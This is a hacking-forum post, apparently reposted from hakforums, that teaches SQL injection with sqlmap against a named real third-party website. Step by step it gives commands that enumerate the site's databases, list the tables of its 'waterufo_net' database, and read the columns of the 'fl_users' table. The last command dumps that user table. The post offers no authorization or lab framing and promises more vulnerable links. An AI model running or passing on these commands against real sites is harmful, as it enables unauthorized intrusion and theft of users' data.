Jump to content
.Slacker

Tutorial SQLMAP

Recommended Posts

Posted

The vulnerable link I’m going to use is

(more vulneable link's at the end)

"http://www.waterufo.net/item.php?id=200"

1. Open BackTrack5 and Open a new Konsole

Type the file path of sqlmap:

cd /pentest/web/scanners/sqlmap

34644015842350654208.jpg

Next step is..

/sqlmap.py -u http://www.waterufo.net/item.php?id=200 --level 5 --risk 3 --dbs

(If we want to scan the full website, the syntax will be ./sqlmap.py -u Welcome to Water UFO Research Site --level 5 --risk 3 --dbs)

82054218911161020742.jpg

89277539897117156238.jpg

We got information that the parameter is injectable

Type 'N' (I’m stopping the scan because i got one injectable parameter, if u want u can continue the scan)

We got the database names

The next step is to find the tables and columns on the database, I’m taking the database “waterufo_net”

/sqlmap.py -u http://www.waterufo.net/item.php?id=200 --tables -D waterufo_net

We got all the tables in the database:

86063443729909264894.jpg

Next we have to find the columns in the table fl_users

/sqlmap.py -u http://www.waterufo.net/item.php?id=200 --columns -T fl_users -D waterufo_net

16418525388240130515.jpg

it will display the columns on the database:

10922445452556582574.jpg

to retrieve the column values type --dump at the end of the previous query:

/sqlmap.py -u http://www.waterufo.net/item.php?id=200 --columns -T fl_users -D waterufo_net --dump

98550949249965232967.jpg

Sursa:

hakforums.net

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...